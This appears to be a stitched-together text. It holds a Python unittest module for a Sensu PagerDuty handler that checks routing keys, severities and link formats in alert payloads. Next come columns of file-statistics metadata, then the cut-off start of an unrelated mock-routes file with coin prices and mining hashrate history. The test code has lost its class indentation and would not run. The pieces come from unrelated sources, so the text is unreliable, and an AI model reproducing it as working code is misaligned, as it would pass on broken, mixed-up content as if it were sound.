        "severity": "error",
        "links": [{"href": "https://sensu.io", "text": "RunBook"}],
        "output": "No keepalive sent from client for 1337 seconds (>=300)",
        "status": 1,
        "type": "standard",
        "history": ["1", "1", "1"],
    }
    return {
        "client": client_section,
        "check": check_section,
        "occurrences": 3,
        "action": "create",
    }
def settings_teams():
    """Return handler settings that include a team-specific API key (`team_1`)."""
    pagerduty_cfg = {
        "api_key": "default_key",
        "svc_email": "test@example.com",
        "team_1": {"api_key": "team_1_key"},
        "dynamic_description_prefix_key": "name",
    }
    return {"pagerduty": pagerduty_cfg}
def settings_no_teams():
    """Return handler settings with only the default API key (no team entries)."""
    pagerduty_cfg = {
        "api_key": "default_key",
        "svc_email": "test@example.com",
        "dynamic_description_prefix_key": "name",
    }
    return {"pagerduty": pagerduty_cfg}
@mock.patch("pypd.EventV2.create")
@mock.patch("pagerduty.handler.PagerdutyHandler.grab_event")
@mock.patch("pagerduty.handler.PagerdutyHandler.grab_settings")
@mock.patch("sys.stdin")
class TestPagerdutyHandler(unittest.TestCase):
"""Test handle if handler config (settings) and event['client'] has pager_team"""
def test_handle_pager_team_client_and_settings(self, mock_stdin, mock_grab_settings, mock_grab_event,
mock_event_create):
settings = settings_teams()
event = event_no_teams()
event['client']['pager_team'] = 'team_1'
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'team_1_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client for 1337 seconds (>=300)',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': 'No keepalive sent from client for 1337 seconds (>=300)'
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
'''Test handle if handler config (settings) and event['check'] has pager_team'''
def test_handle_pager_team_check_and_settings(self, mock_stdin, mock_grab_settings, mock_grab_event,
mock_event_create):
settings = settings_teams()
event = event_no_teams()
event['check']['pager_team'] = 'team_1'
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'team_1_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client for 1337 seconds (>=300)',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': 'No keepalive sent from client for 1337 seconds (>=300)'
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
'''Test handle if handler config (settings) has pager_team but event does not'''
def test_handle_pager_team_settings_not_event(self, mock_stdin, mock_grab_settings, mock_grab_event,
mock_event_create):
settings = settings_teams()
event = event_no_teams()
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client for 1337 seconds (>=300)',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': 'No keepalive sent from client for 1337 seconds (>=300)'
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
'''Test handle if event['check'] has pager_team but handler config (settings) does not'''
def test_handle_pager_team_check_not_settings(self, mock_stdin, mock_grab_settings, mock_grab_event,
mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
event['check']['pager_team'] = 'team_1'
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client for 1337 seconds (>=300)',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': 'No keepalive sent from client for 1337 seconds (>=300)'
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
'''Test handle if neither handler config (settings) or event has pager_team'''
def test_handle_pager_team_no_event_no_settings(self, mock_stdin, mock_grab_settings, mock_grab_event,
mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client for 1337 seconds (>=300)',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': 'No keepalive sent from client for 1337 seconds (>=300)'
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
'''Test handle if severity is not info, warning, critical, or error'''
def test_handle_severity_assert_fail(self, mock_stdin, mock_grab_settings, mock_grab_event, mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
event['check']['severity'] = 'thingy'
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client for 1337 seconds (>=300)',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': 'No keepalive sent from client for 1337 seconds (>=300)'
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
'''Test handle if event['check']['severity'] is info'''
def test_handle_severity_info(self, mock_stdin, mock_grab_settings, mock_grab_event, mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
event['check']['severity'] = 'info'
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client for 1337 seconds (>=300)',
'severity': 'info',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': 'No keepalive sent from client for 1337 seconds (>=300)'
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
'''Test handle if event['check']['severity'] is warning'''
def test_handle_severity_warning(self, mock_stdin, mock_grab_settings, mock_grab_event, mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
event['check']['severity'] = 'warning'
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client for 1337 seconds (>=300)',
'severity': 'warning',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': 'No keepalive sent from client for 1337 seconds (>=300)'
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
'''Test handle if event['check']['severity'] is critical'''
def test_handle_severity_critical(self, mock_stdin, mock_grab_settings, mock_grab_event, mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
event['check']['severity'] = 'critical'
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client for 1337 seconds (>=300)',
'severity': 'critical',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': 'No keepalive sent from client for 1337 seconds (>=300)'
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
'''Test handle if event['check']['severity'] is error'''
def test_handle_severity_error(self, mock_stdin, mock_grab_settings, mock_grab_event, mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
event['check']['severity'] = 'error'
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client for 1337 seconds (>=300)',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': 'No keepalive sent from client for 1337 seconds (>=300)'
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
'''Test handle if output is a dictionary'''
def test_handle_output_dict_with_PD_context(self, mock_stdin, mock_grab_settings, mock_grab_event,
mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
event['check']['output'] = {
'Summary': 'No keepalive sent from client',
'Details': 'No keepalive sent from client for 1337 seconds (>=300)',
'Status': 'Unable to authenticate with Salt to attempt restart. Restart not attempted Unable parse minions '
'name to attempt restart. Restart not attempted'
}
event['check']['pagerduty_contexts'] = ['This is a pd context', 'This is another pd context']
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': {
'Status': 'Unable to authenticate with Salt to attempt restart. Restart not attempted Unable parse '
'minions name to attempt restart. Restart not attempted',
'Contexts': ['This is a pd context', 'This is another pd context'],
'Details': 'No keepalive sent from client for 1337 seconds (>=300)'
}
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
def test_handle_output_dict_with_no_PD_context(self, mock_stdin, mock_grab_settings, mock_grab_event,
mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
event['check']['output'] = {
'Summary': 'No keepalive sent from client',
'Details': 'No keepalive sent from client for 1337 seconds (>=300)',
'Status': 'Unable to authenticate with Salt to attempt restart. Restart not attempted Unable parse minions '
'name to attempt restart. Restart not attempted'
}
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': {
'Status': 'Unable to authenticate with Salt to attempt restart. Restart not attempted Unable parse '
'minions name to attempt restart. Restart not attempted',
'Details': 'No keepalive sent from client for 1337 seconds (>=300)'
}
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
def test_handle_output_no_status_no_PD_context(self, mock_stdin, mock_grab_settings, mock_grab_event,
mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
event['check']['output'] = {
'Summary': 'No keepalive sent from client',
'Details': 'No keepalive sent from client for 1337 seconds (>=300)'
}
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "RunBook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': 'No keepalive sent from client for 1337 seconds (>=300)'
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
def test_handle_links_as_string(self, mock_stdin, mock_grab_settings, mock_grab_event, mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
event['check']['output'] = {
'Summary': 'No keepalive sent from client',
'Details': 'No keepalive sent from client for 1337 seconds (>=300)',
'Status': 'Unable to authenticate with Salt to attempt restart. Restart not attempted Unable parse minions '
'name to attempt restart. Restart not attempted'
}
event['check']['pagerduty_contexts'] = ['This is a pd context', 'This is another pd context']
event['check']['links'] = 'https://sensu.io'
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': {
'Status': 'Unable to authenticate with Salt to attempt restart. Restart not attempted Unable parse '
'minions name to attempt restart. Restart not attempted',
'Contexts': ['This is a pd context', 'This is another pd context'],
'Details': 'No keepalive sent from client for 1337 seconds (>=300)'
}
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
def test_handle_links_as_list(self, mock_stdin, mock_grab_settings, mock_grab_event, mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
event['check']['output'] = {
'Summary': 'No keepalive sent from client',
'Details': 'No keepalive sent from client for 1337 seconds (>=300)',
'Status': 'Unable to authenticate with Salt to attempt restart. Restart not attempted Unable parse minions '
'name to attempt restart. Restart not attempted'
}
event['check']['pagerduty_contexts'] = ['This is a pd context', 'This is another pd context']
event['check']['links'] = ['https://sensu.io', 'https://example.com']
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io"}, {"href": "https://example.com"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': {
'Status': 'Unable to authenticate with Salt to attempt restart. Restart not attempted Unable parse '
'minions name to attempt restart. Restart not attempted',
'Contexts': ['This is a pd context', 'This is another pd context'],
'Details': 'No keepalive sent from client for 1337 seconds (>=300)'
}
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
def test_handle_links_as_dict(self, mock_stdin, mock_grab_settings, mock_grab_event, mock_event_create):
settings = settings_no_teams()
event = event_no_teams()
event['check']['output'] = {
'Summary': 'No keepalive sent from client',
'Details': 'No keepalive sent from client for 1337 seconds (>=300)',
'Status': 'Unable to authenticate with Salt to attempt restart. Restart not attempted Unable parse minions '
'name to attempt restart. Restart not attempted'
}
event['check']['pagerduty_contexts'] = ['This is a pd context', 'This is another pd context']
event['check']['links'] = [{'href': 'https://sensu.io', 'text': 'Runbook'}]
stdin = mock_stdin.read.return_value = json.dumps(event)
mock_event = mock_grab_event.return_value = event
mock_settings = mock_grab_settings.return_value = settings
handler = PagerdutyHandler()
payload = {}
payload = {
'routing_key': 'default_key',
'event_action': 'trigger',
'dedup_key': 'keepalive/test_client',
'images': None,
'links': [{"href": "https://sensu.io", "text": "Runbook"}],
'payload': {
'summary': '( test_client ) No keepalive sent from client',
'severity': 'error',
'source': 'test_client',
'class': None,
'group': None,
'component': None,
'custom_details': {
'Status': 'Unable to authenticate with Salt to attempt restart. Restart not attempted Unable parse '
'minions name to attempt restart. Restart not attempted',
'Contexts': ['This is a pd context', 'This is another pd context'],
'Details': 'No keepalive sent from client for 1337 seconds (>=300)'
}
}}
logging.debug("Event called with pypd.EventV2.create(data=" + json.dumps(payload))
mock_event_create.assert_called_with(data=payload)
# Allow running this test module directly (e.g. `python test_pagerduty.py`).
if __name__ == '__main__':
    unittest.main()
| 38.073892
| 112
| 0.684133
| 2,908
| 23,187
| 5.229367
| 0.052957
| 0.038469
| 0.044387
| 0.056224
| 0.925363
| 0.918919
| 0.910041
| 0.896429
| 0.8865
| 0.8865
| 0
| 0.016047
| 0.169535
| 23,187
| 608
| 113
| 38.136513
| 0.773681
| 0.003235
| 0
| 0.807143
| 0
| 0
| 0.416927
| 0.040601
| 0
| 0
| 0
| 0
| 0.030357
| 1
| 0.033929
| false
| 0
| 0.008929
| 0
| 0.05
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7980595d4600e1efb7374b482179ffcfdab98a68
| 16,731
|
py
|
Python
|
test/apps/minermedic/resources/mining_pools/f2pool.py
|
holitics/minermedic
|
39dd03e58d665bea23f1e9c9ab134a794d092cb1
|
[
"Apache-2.0"
] | 2
|
2020-02-13T15:32:43.000Z
|
2020-04-08T04:10:10.000Z
|
test/apps/minermedic/resources/mining_pools/f2pool.py
|
alimogh/minermedic
|
39dd03e58d665bea23f1e9c9ab134a794d092cb1
|
[
"Apache-2.0"
] | 11
|
2019-11-23T00:20:23.000Z
|
2020-01-02T02:17:55.000Z
|
test/apps/minermedic/resources/mining_pools/f2pool.py
|
alimogh/minermedic
|
39dd03e58d665bea23f1e9c9ab134a794d092cb1
|
[
"Apache-2.0"
] | 2
|
2020-06-15T22:32:43.000Z
|
2020-07-17T18:40:58.000Z
|
routes = {
'/data/price?fsym=BTC&tsyms=USD': {'USD': 7500.22},
'/data/price?fsym=LTC&tsyms=USD' : {'USD': 46.80},
'/litecoin/holitics/001' : {"hashrate_history": {"2019-11-30T18:30:00Z": 171798692, "2019-11-30T18:40:00Z": 264856317, "2019-11-30T18:50:00Z": 193273528, "2019-11-30T19:00:00Z": 300647711, "2019-11-30T19:10:00Z": 207590086, "2019-11-30T19:20:00Z": 229064922, "2019-11-30T19:30:00Z": 272014595, "2019-11-30T19:40:00Z": 372230499, "2019-11-30T19:50:00Z": 272014595, "2019-11-30T20:00:00Z": 300647711, "2019-11-30T20:10:00Z": 200431807, "2019-11-30T20:20:00Z": 286331153, "2019-11-30T20:30:00Z": 229064922, "2019-11-30T20:40:00Z": 229064922, "2019-11-30T20:50:00Z": 314964268, "2019-11-30T21:00:00Z": 272014595, "2019-11-30T21:10:00Z": 229064922, "2019-11-30T21:20:00Z": 143165577, "2019-11-30T21:30:00Z": 164640413, "2019-11-30T21:40:00Z": 243381480, "2019-11-30T21:50:00Z": 114532461, "2019-11-30T22:00:00Z": 186115249, "2019-11-30T22:10:00Z": 171798692, "2019-11-30T22:20:00Z": 229064922, "2019-11-30T22:30:00Z": 293489432, "2019-11-30T22:40:00Z": 314964268, "2019-11-30T22:50:00Z": 214748365, "2019-11-30T23:00:00Z": 200431807, "2019-11-30T23:10:00Z": 257698038, "2019-11-30T23:20:00Z": 28633115, "2019-11-30T23:30:00Z": 0, "2019-11-30T23:40:00Z": 0, "2019-11-30T23:50:00Z": 0, "2019-12-01T00:00:00Z": 0, "2019-12-01T00:10:00Z": 0, "2019-12-01T00:20:00Z": 0, "2019-12-01T00:30:00Z": 0, "2019-12-01T00:40:00Z": 0, "2019-12-01T00:50:00Z": 0, "2019-12-01T01:00:00Z": 0, "2019-12-01T01:10:00Z": 0, "2019-12-01T01:20:00Z": 0, "2019-12-01T01:30:00Z": 0, "2019-12-01T01:40:00Z": 0, "2019-12-01T01:50:00Z": 0, "2019-12-01T02:00:00Z": 0, "2019-12-01T02:10:00Z": 0, "2019-12-01T02:20:00Z": 0, "2019-12-01T02:30:00Z": 0, "2019-12-01T02:40:00Z": 0, "2019-12-01T02:50:00Z": 0, "2019-12-01T03:00:00Z": 0, "2019-12-01T03:10:00Z": 0, "2019-12-01T03:20:00Z": 0, "2019-12-01T03:30:00Z": 0, "2019-12-01T03:40:00Z": 0, "2019-12-01T03:50:00Z": 0, "2019-12-01T04:00:00Z": 0, "2019-12-01T04:10:00Z": 0, "2019-12-01T04:20:00Z": 0, "2019-12-01T04:30:00Z": 0, "2019-12-01T04:40:00Z": 0, "2019-12-01T04:50:00Z": 0, 
"2019-12-01T05:00:00Z": 0, "2019-12-01T05:10:00Z": 0, "2019-12-01T05:20:00Z": 0, "2019-12-01T05:30:00Z": 0, "2019-12-01T05:40:00Z": 0, "2019-12-01T05:50:00Z": 0, "2019-12-01T06:00:00Z": 0, "2019-12-01T06:10:00Z": 0, "2019-12-01T06:20:00Z": 0, "2019-12-01T06:30:00Z": 0, "2019-12-01T06:40:00Z": 0, "2019-12-01T06:50:00Z": 0, "2019-12-01T07:00:00Z": 0, "2019-12-01T07:10:00Z": 0, "2019-12-01T07:20:00Z": 0, "2019-12-01T07:30:00Z": 0, "2019-12-01T07:40:00Z": 0, "2019-12-01T07:50:00Z": 0, "2019-12-01T08:00:00Z": 0, "2019-12-01T08:10:00Z": 0, "2019-12-01T08:20:00Z": 0, "2019-12-01T08:30:00Z": 0, "2019-12-01T08:40:00Z": 0, "2019-12-01T08:50:00Z": 0, "2019-12-01T09:00:00Z": 0, "2019-12-01T09:10:00Z": 0, "2019-12-01T09:20:00Z": 0, "2019-12-01T09:30:00Z": 0, "2019-12-01T09:40:00Z": 0, "2019-12-01T09:50:00Z": 0, "2019-12-01T10:00:00Z": 0, "2019-12-01T10:10:00Z": 0, "2019-12-01T10:20:00Z": 0, "2019-12-01T10:30:00Z": 0, "2019-12-01T10:40:00Z": 0, "2019-12-01T10:50:00Z": 0, "2019-12-01T11:00:00Z": 0, "2019-12-01T11:10:00Z": 0, "2019-12-01T11:20:00Z": 0, "2019-12-01T11:30:00Z": 0, "2019-12-01T11:40:00Z": 0, "2019-12-01T11:50:00Z": 0, "2019-12-01T12:00:00Z": 0, "2019-12-01T12:10:00Z": 0, "2019-12-01T12:20:00Z": 0, "2019-12-01T12:30:00Z": 0, "2019-12-01T12:40:00Z": 0, "2019-12-01T12:50:00Z": 0, "2019-12-01T13:00:00Z": 0, "2019-12-01T13:10:00Z": 0, "2019-12-01T13:20:00Z": 0, "2019-12-01T13:30:00Z": 0, "2019-12-01T13:40:00Z": 0, "2019-12-01T13:50:00Z": 0, "2019-12-01T14:00:00Z": 0, "2019-12-01T14:10:00Z": 0, "2019-12-01T14:20:00Z": 0, "2019-12-01T14:30:00Z": 0, "2019-12-01T14:40:00Z": 0, "2019-12-01T14:50:00Z": 0, "2019-12-01T15:00:00Z": 0, "2019-12-01T15:10:00Z": 0, "2019-12-01T15:20:00Z": 0, "2019-12-01T15:30:00Z": 0, "2019-12-01T15:40:00Z": 0, "2019-12-01T15:50:00Z": 0, "2019-12-01T16:00:00Z": 0, "2019-12-01T16:10:00Z": 0, "2019-12-01T16:20:00Z": 0, "2019-12-01T16:30:00Z": 0, "2019-12-01T16:40:00Z": 0, "2019-12-01T16:50:00Z": 0, "2019-12-01T17:00:00Z": 0, "2019-12-01T17:10:00Z": 0, 
"2019-12-01T17:20:00Z": 0, "2019-12-01T17:30:00Z": 0, "2019-12-01T17:40:00Z": 0, "2019-12-01T17:50:00Z": 0, "2019-12-01T18:00:00Z": 0, "2019-12-01T18:10:00Z": 0, "2019-12-01T18:20:00Z": 0}, "hashrate_history_local": {"2019-11-30T18:30:00Z": 0, "2019-11-30T18:40:00Z": 0, "2019-11-30T18:50:00Z": 0, "2019-11-30T19:00:00Z": 0, "2019-11-30T19:10:00Z": 0, "2019-11-30T19:20:00Z": 0, "2019-11-30T19:30:00Z": 0, "2019-11-30T19:40:00Z": 0, "2019-11-30T19:50:00Z": 0, "2019-11-30T20:00:00Z": 0, "2019-11-30T20:10:00Z": 0, "2019-11-30T20:20:00Z": 0, "2019-11-30T20:30:00Z": 0, "2019-11-30T20:40:00Z": 0, "2019-11-30T20:50:00Z": 0, "2019-11-30T21:00:00Z": 0, "2019-11-30T21:10:00Z": 0, "2019-11-30T21:20:00Z": 0, "2019-11-30T21:30:00Z": 0, "2019-11-30T21:40:00Z": 0, "2019-11-30T21:50:00Z": 0, "2019-11-30T22:00:00Z": 0, "2019-11-30T22:10:00Z": 0, "2019-11-30T22:20:00Z": 0, "2019-11-30T22:30:00Z": 0, "2019-11-30T22:40:00Z": 0, "2019-11-30T22:50:00Z": 0, "2019-11-30T23:00:00Z": 0, "2019-11-30T23:10:00Z": 0, "2019-11-30T23:20:00Z": 0, "2019-11-30T23:30:00Z": 0, "2019-11-30T23:40:00Z": 0, "2019-11-30T23:50:00Z": 0, "2019-12-01T00:00:00Z": 0, "2019-12-01T00:10:00Z": 0, "2019-12-01T00:20:00Z": 0, "2019-12-01T00:30:00Z": 0, "2019-12-01T00:40:00Z": 0, "2019-12-01T00:50:00Z": 0, "2019-12-01T01:00:00Z": 0, "2019-12-01T01:10:00Z": 0, "2019-12-01T01:20:00Z": 0, "2019-12-01T01:30:00Z": 0, "2019-12-01T01:40:00Z": 0, "2019-12-01T01:50:00Z": 0, "2019-12-01T02:00:00Z": 0, "2019-12-01T02:10:00Z": 0, "2019-12-01T02:20:00Z": 0, "2019-12-01T02:30:00Z": 0, "2019-12-01T02:40:00Z": 0, "2019-12-01T02:50:00Z": 0, "2019-12-01T03:00:00Z": 0, "2019-12-01T03:10:00Z": 0, "2019-12-01T03:20:00Z": 0, "2019-12-01T03:30:00Z": 0, "2019-12-01T03:40:00Z": 0, "2019-12-01T03:50:00Z": 0, "2019-12-01T04:00:00Z": 0, "2019-12-01T04:10:00Z": 0, "2019-12-01T04:20:00Z": 0, "2019-12-01T04:30:00Z": 0, "2019-12-01T04:40:00Z": 0, "2019-12-01T04:50:00Z": 0, "2019-12-01T05:00:00Z": 0, "2019-12-01T05:10:00Z": 0, "2019-12-01T05:20:00Z": 0, 
"2019-12-01T05:30:00Z": 0, "2019-12-01T05:40:00Z": 0, "2019-12-01T05:50:00Z": 0, "2019-12-01T06:00:00Z": 0, "2019-12-01T06:10:00Z": 0, "2019-12-01T06:20:00Z": 0, "2019-12-01T06:30:00Z": 0, "2019-12-01T06:40:00Z": 0, "2019-12-01T06:50:00Z": 0, "2019-12-01T07:00:00Z": 0, "2019-12-01T07:10:00Z": 0, "2019-12-01T07:20:00Z": 0, "2019-12-01T07:30:00Z": 0, "2019-12-01T07:40:00Z": 0, "2019-12-01T07:50:00Z": 0, "2019-12-01T08:00:00Z": 0, "2019-12-01T08:10:00Z": 0, "2019-12-01T08:20:00Z": 0, "2019-12-01T08:30:00Z": 0, "2019-12-01T08:40:00Z": 0, "2019-12-01T08:50:00Z": 0, "2019-12-01T09:00:00Z": 0, "2019-12-01T09:10:00Z": 0, "2019-12-01T09:20:00Z": 0, "2019-12-01T09:30:00Z": 0, "2019-12-01T09:40:00Z": 0, "2019-12-01T09:50:00Z": 0, "2019-12-01T10:00:00Z": 0, "2019-12-01T10:10:00Z": 0, "2019-12-01T10:20:00Z": 0, "2019-12-01T10:30:00Z": 0, "2019-12-01T10:40:00Z": 0, "2019-12-01T10:50:00Z": 0, "2019-12-01T11:00:00Z": 0, "2019-12-01T11:10:00Z": 0, "2019-12-01T11:20:00Z": 0, "2019-12-01T11:30:00Z": 0, "2019-12-01T11:40:00Z": 0, "2019-12-01T11:50:00Z": 0, "2019-12-01T12:00:00Z": 0, "2019-12-01T12:10:00Z": 0, "2019-12-01T12:20:00Z": 0, "2019-12-01T12:30:00Z": 0, "2019-12-01T12:40:00Z": 0, "2019-12-01T12:50:00Z": 0, "2019-12-01T13:00:00Z": 0, "2019-12-01T13:10:00Z": 0, "2019-12-01T13:20:00Z": 0, "2019-12-01T13:30:00Z": 0, "2019-12-01T13:40:00Z": 0, "2019-12-01T13:50:00Z": 0, "2019-12-01T14:00:00Z": 0, "2019-12-01T14:10:00Z": 0, "2019-12-01T14:20:00Z": 0, "2019-12-01T14:30:00Z": 0, "2019-12-01T14:40:00Z": 0, "2019-12-01T14:50:00Z": 0, "2019-12-01T15:00:00Z": 0, "2019-12-01T15:10:00Z": 0, "2019-12-01T15:20:00Z": 0, "2019-12-01T15:30:00Z": 0, "2019-12-01T15:40:00Z": 0, 